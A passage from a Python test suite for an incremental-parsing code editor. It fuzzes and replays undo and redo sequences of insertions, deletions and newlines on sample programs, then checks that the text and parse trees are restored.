atext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("b")
self.treemanager.undo_snapshot()
b = self.copy()
btext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("c")
self.treemanager.undo_snapshot()
#c = self.copy()
ctext = self.treemanager.export_as_text()
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("d")
self.treemanager.undo_snapshot()
#d = self.copy()
dtext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("e")
self.treemanager.undo_snapshot()
#e = self.copy()
etext = self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.text_compare(etext)
self.treemanager.key_ctrl_z()
self.text_compare(dtext)
self.treemanager.key_ctrl_z()
self.text_compare(ctext)
self.treemanager.key_ctrl_z()
self.text_compare(btext)
self.treemanager.key_ctrl_z()
self.text_compare(atext)
self.treemanager.key_ctrl_z()
self.text_compare(imptext)
def text_compare(self, original):
original = original.replace("\r", "").split("\n")
current = self.treemanager.export_as_text("/dev/null").replace("\r", "").split("\n")
assert len(original) == len(current)
for i in range(len(current)):
assert original[i] == current[i]
def copy(self):
import copy
return copy.deepcopy(self.parser.previous_version.parent)
def test_import(self):
self.reset() # saves automatically
self.treemanager.import_file("class X:\n def x():\n pass") # saves automatically
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_normal("1")
self.compare("class X:\n def x():\n pass1")
self.treemanager.key_ctrl_z()
self.compare("class X:\n def x():\n pass")
def test_overflow(self):
self.reset() # this saves the initial version as 1
self.treemanager.import_file("class X:\n def x():\n pass")
min_version = self.treemanager.version
max_version = self.treemanager.version
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
assert self.treemanager.version == min_version
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
assert self.treemanager.version == max_version
@slow
def test_undo_random_deletion_short(self):
import random
self.reset()
program = """class Connect4(object):
UI_DEPTH = 5 # lookahead for minimax
def __init__(self, p1_is_ai, p2_is_ai):
self.top = tk.Tk()
self.top.title("Unipycation: Connect 4 GUI (Python)")
def _set_status_text(self, text):
self.status_text["text"] = text
def _update_from_pos_one_colour(self, pylist, colour):
assert colour in ["red", "yellow"]
for c in pylist:
assert c.name == "c"
(x, y) = c
self.cols[x][y]["background"] = colour"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(10))
random.shuffle(cols)
for col in cols:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
def test_undo_random_deletion_short_bug1(self):
self.reset()
program = """class Connect4(object):
UI_DEPTH = 5 # lookahead for minimax
def __init__(self, p1_is_ai, p2_is_ai):
self.top = tk.Tk()
self.top.title("Unipycation: Connect 4 GUI (Python)")
def _set_status_text(self, text):
self.status_text["text"] = text
def _update_from_pos_one_colour(self, pylist, colour):
assert colour in ["red", "yellow"]
for c in pylist:
assert c.name == "c"
(x, y) = c
self.cols[x][y]["background"] = colour"""
self.treemanager.import_file(program)
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.move(LEFT, 3)
self.treemanager.key_delete()
self.move(LEFT, 1)
self.treemanager.key_delete()
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.move(LEFT, 4)
self.treemanager.key_delete()
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.move(LEFT, 5)
self.treemanager.key_delete()
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.move(LEFT, 7)
self.treemanager.key_delete()
self.move(RIGHT, 4)
self.treemanager.key_delete()
def test_undo_random_deletion_fast(self):
# fast fuzz test that can run as part of normal test runs
import random
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.text_compare(programs.pythonsmall)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols[:5]:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
parser.init_ast()
t1.add_parser(parser, lexer, python.name)
t1.set_font_test(7, 17)
t1.import_file(programs.pythonsmall)
assert self.parser.last_status == True
assert parser.last_status == True
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_deletion(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
parser.init_ast()
t1.add_parser(parser, lexer, python.name)
t1.set_font_test(7, 17)
t1.import_file(programs.connect4)
assert self.parser.last_status == True
assert parser.last_status == True
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_deletion_bug1(self):
self.reset()
src = """class X:
def _end(self, winner_colour=None):
for i in self.insert_buttons:
i["state"] = tk.DISABLED
"""
self.treemanager.import_file(src)
assert self.parser.last_status == True
self.text_compare(src)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(src)
def test_undo_random_deletion_bug2(self):
self.reset()
self.treemanager.import_file("""class Connect4(object):
UI_DEPTH = 5
def __init__():
self.top = 1
self.top.title()
self.pl_engine = 2
self.turn = None
self.ai_players = 3
self.cols = []
self.insert_buttons = []
def _set_status_text():
self.status_text = 4""")
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 14)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 16)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 15)
self.treemanager.key_delete() # infinite loop
def test_undo_random_deletion_bug3(self):
self.reset()
program = """class Connect4():
pass
def __init__():
pass
for x in y:
pass
for x in y:
pass
pass
pass
pass
def _end():
if winner_colour:
pass
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 16)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 16)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 4)
self.treemanager.key_delete()
def test_undo_random_deletion_bug3_short(self):
self.reset()
program = """class Connect4():
pass
def __init__():
pass
for x in y:
pass
for x in y:
pass
pass
pass
pass
def _end():
if winner_colour:
pass
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 16)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_random_undo_deletion_bug4(self):
# Occurred while implementing retain changes
self.reset()
connect4 = """class X:
def __init__():
if x:
for rowno in ROWS:
a
b
c
d
e"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_undo_random_deletion_bug5(self):
self.reset()
connect4 = """class Connect4:
def __init__(self):
pass1X
def _update_from_pos_one_colour():
pass2
def _turn(self):
while True:
pass3X
def _end():
for i in buttons:
pass4
if winner_colour:
pass5"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_end()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 0)
self.treemanager.key_delete()
def test_undo_random_deletion_bug6(self):
self.reset()
self.treemanager.import_file("""class X:
def helloworld():
for x in y:
if x:
pass1
else:
pass2
pass3
def foo(x):
pass4""")
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 5)
self.treemanager.key_delete()
def test_undo_random_deletion_bug7(self):
self.reset()
self.treemanager.import_file("""class Connect4():
def _update_from_pos_one_colour():
self.cols[x][y]["background"] = colour""")
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 17)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
def test_undo_random_deletion_bug8(self):
# This is a test for a bug in the out-of-context analysis, where the
# boundaries of the subtree being parsed were not strictly defined,
# causing the parser to reduce and reuse nodes outside of the original
# subtree. When the analysis then failed, those reused subtrees were
# not reverted, leading to errors with subtrees that had become
# detached from the main parse tree.
# This was solved by cutting the subtree's root off from its parent
# during the out-of-context analysis and reattaching it afterwards.
self.reset()
self.treemanager.import_file("""class Connect4():
def f1():
a
b
for c in d:
e
f
g
h
for i in j:
k
def f2():
while True:
l
if m:
n
def f3():
for o in p:
q
if r:
s
t("%s wins" % winner_colour)""")
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 25)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_end()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 14)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 14)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 26)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 24)
self.move(RIGHT, 16)
self.treemanager.key_delete()
def test_undo_random_deletion_bug9(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.pl_engine = uni.Engine()""")
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 15)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.key_delete()
def get_random_key(self):
import random
keys = list("abcdefghijklmnopqrstuvwxyz0123456789 \r:,.[]{}()!$%^&*()_+=")
return random.choice(keys)
@slow
def test_undo_random_insertion(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
self.treemanager.cursor_reset()
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
print("self.treemanager.key_normal(%s)" % repr(k))
x = self.treemanager.key_normal(k)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.connect4)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_insertion_fast(self):
import random
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.text_compare(programs.pythonsmall)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(10))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
print("self.treemanager.key_normal(%s)" % repr(k))
x = self.treemanager.key_normal(k)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.pythonsmall)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_insertion_fast_bug1(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('p')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 7)
self.treemanager.key_normal('.')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('9')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_normal('6')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 6)
self.treemanager.key_normal('$')
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 1)
self.treemanager.key_normal('j')
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 0)
self.treemanager.key_normal('o')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 3)
self.treemanager.key_normal('2')
self.treemanager.undo_snapshot()
for i in range(20):
self.treemanager.key_ctrl_z()
def test_undo_random_insertion_retain_bug(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5""")
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 14)
self.treemanager.key_normal('b')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 2)
self.treemanager.key_normal('w')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 5)
self.treemanager.key_normal('^')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 8)
self.treemanager.key_normal('!')
def test_undo_random_newlines(self):
import random
self.reset()
p = """class X:
def helloworld(x, y, z):
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13
def foo(x):
x = 1
y = 2
foo()
return 12"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines[:2]:
cols = list(range(20))
random.shuffle(cols)
for col in cols[:1]: # add one newline per line
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_normal(\"\r\")")
self.move(DOWN, linenr)
self.move(RIGHT, col)
x = self.treemanager.key_normal("\r")
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newline_2(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in y:
if x:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 1)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 1)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newlines_3(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.move(DOWN, 5)
self.move(RIGHT, 7)
self.treemanager.key_normal("\r")
def test_bug_delete(self):
import random
self.reset()
p = """class X:
def helloworld():
for x in y:
if x:
return 1
else:
return 12
return 13"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
